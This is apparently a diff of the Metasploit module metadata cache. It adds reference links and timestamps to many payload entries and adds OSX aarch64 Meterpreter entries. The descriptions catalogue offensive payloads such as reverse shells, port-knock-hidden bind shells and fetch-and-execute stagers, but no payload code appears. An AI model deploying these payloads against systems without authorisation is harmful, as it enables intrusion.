    "platform": "Windows",
    "arch": "cmd",
@@ -201468,7 +204425,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201511,7 +204468,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201760,7 +204717,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201805,7 +204762,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -202720,7 +205677,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from certain IP and spawn a command shell.\nThe shellcode will reply with a RST packet if the connections is not\ncoming from the IP defined in AHOST. This way the port will appear\nas \"closed\" helping us to hide the shellcode.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -202842,7 +205799,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -202887,7 +205844,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -203724,7 +206681,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -203769,7 +206727,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206128,7 +209087,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206171,7 +209130,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206213,7 +209172,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206255,7 +209214,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206302,7 +209261,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206345,7 +209304,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206387,7 +209346,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206429,7 +209388,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206476,7 +209435,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206519,7 +209478,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210394,7 +213353,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210437,7 +213396,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210479,7 +213438,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a pipe connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210521,7 +213480,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210568,7 +213527,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210611,7 +213570,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210653,7 +213612,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210695,7 +213654,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210742,7 +213701,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210785,7 +213744,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -212194,7 +215153,7 @@
    ],
    "description": "Creates an interactive shell using AWS SSM",
    "references": [
-
+      "URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there"
    ],
    "platform": "All",
    "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
@@ -212202,7 +215161,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-04-18 16:41:48 +0000",
+    "mod_time": "2023-08-01 15:02:11 +0000",
    "path": "/modules/payloads/singles/generic/shell_bind_aws_ssm.rb",
    "is_install_path": true,
    "ref_name": "generic/shell_bind_aws_ssm",
@@ -212456,7 +215415,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-19 20:34:33 +0000",
+    "mod_time": "2023-09-27 11:20:17 +0000",
    "path": "/modules/payloads/stagers/java/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "java/meterpreter/bind_tcp",
@@ -212497,7 +215456,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-11-10 12:33:52 +0000",
+    "mod_time": "2023-08-09 13:13:15 +0000",
    "path": "/modules/payloads/stagers/java/reverse_http.rb",
    "is_install_path": true,
    "ref_name": "java/meterpreter/reverse_http",
@@ -212538,7 +215497,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-11-10 12:33:52 +0000",
+    "mod_time": "2023-08-09 13:13:15 +0000",
    "path": "/modules/payloads/stagers/java/reverse_https.rb",
    "is_install_path": true,
    "ref_name": "java/meterpreter/reverse_https",
@@ -212578,7 +215537,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-19 20:34:33 +0000",
+    "mod_time": "2023-09-27 11:20:17 +0000",
    "path": "/modules/payloads/stagers/java/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "java/meterpreter/reverse_tcp",
@@ -212617,7 +215576,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-19 20:34:33 +0000",
+    "mod_time": "2023-09-27 11:20:17 +0000",
    "path": "/modules/payloads/stagers/java/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "java/shell/bind_tcp",
@@ -212656,7 +215615,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-19 20:34:33 +0000",
+    "mod_time": "2023-09-27 11:20:17 +0000",
    "path": "/modules/payloads/stagers/java/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "java/shell/reverse_tcp",
@@ -212695,7 +215654,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-03-19 20:34:33 +0000",
+    "mod_time": "2023-09-27 11:20:17 +0000",
    "path": "/modules/payloads/singles/java/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "java/shell_reverse_tcp",
@@ -212771,7 +215730,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -212809,7 +215768,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -212847,7 +215806,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -212959,7 +215918,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -212997,7 +215956,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -213035,7 +215994,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -213063,7 +216022,7 @@
    ],
    "description": "Listen for a connection and spawn a command shell",
    "references": [
-
+      "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s"
    ],
    "platform": "Linux",
    "arch": "armbe",
@@ -213071,7 +216030,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/shell_bind_tcp",
@@ -213260,7 +216219,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_http",
@@ -213298,7 +216257,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_https",
@@ -213336,7 +216295,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -213524,7 +216483,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -213562,7 +216521,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -213600,7 +216559,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -213715,7 +216674,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -213753,7 +216712,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -213791,7 +216750,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -214058,7 +217017,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -214096,7 +217055,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -214134,7 +217093,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -214324,7 +217283,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -214362,7 +217321,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -214400,7 +217359,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -214654,7 +217613,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -214692,7 +217651,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -214730,7 +217689,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -214768,7 +217727,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -214806,7 +217765,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -214844,7 +217803,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -215037,7 +217996,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_http",
@@ -215075,7 +218034,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_https",
@@ -215113,7 +218072,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -215401,7 +218360,7 @@
    ],
    "description": "Listen for a connection in a random port and spawn a command shell.\n        Use nmap to discover the open port: 'nmap -sS target -p-'.",
    "references": [
-
+      "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
    ],
    "platform": "Linux",
    "arch": "x64",
@@ -215409,7 +218368,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell_bind_tcp_random_port",
@@ -216937,7 +219896,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -216975,7 +219934,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -217013,7 +219972,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -217287,6 +220246,165 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_osx/aarch64/meterpreter/reverse_tcp": {
+    "name": "OSX Meterpreter, Reverse TCP Stager",
+    "fullname": "payload/osx/aarch64/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "parchedmind",
+      "nologic",
+      "timwr",
+      "usiegl00"
+    ],
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
+    "references": [
+      "URL-https://github.com/CylanceVulnResearch/osx_runbin",
+      "URL-https://github.com/nologic/shellcc"
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-07-31 20:30:30 +0000",
+    "path": "/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 2,
+    "staged": true,
+    "stage_refname": "osx/aarch64/meterpreter",
+    "stager_refname": "osx/aarch64/reverse_tcp"
+  },
+  "payload_osx/aarch64/meterpreter_reverse_http": {
+    "name": "OSX Meterpreter, Reverse HTTP Inline",
+    "fullname": "payload/osx/aarch64/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr",
+      "usiegl00"
+    ],
+    "description": "Run the Meterpreter / Mettle server payload (stageless)",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-06-19 12:11:18 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
+  "payload_osx/aarch64/meterpreter_reverse_https": {
+    "name": "OSX Meterpreter, Reverse HTTPS Inline",
+    "fullname": "payload/osx/aarch64/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr",
+      "usiegl00"
+    ],
+    "description": "Run the Meterpreter / Mettle server payload (stageless)",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-06-19 12:11:18 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
+  "payload_osx/aarch64/meterpreter_reverse_tcp": {
+    "name": "OSX Meterpreter, Reverse TCP Inline",
+    "fullname": "payload/osx/aarch64/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr",
+      "usiegl00"
+    ],
+    "description": "Run the Meterpreter / Mettle server payload (stageless)",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-06-19 12:11:18 +0000",
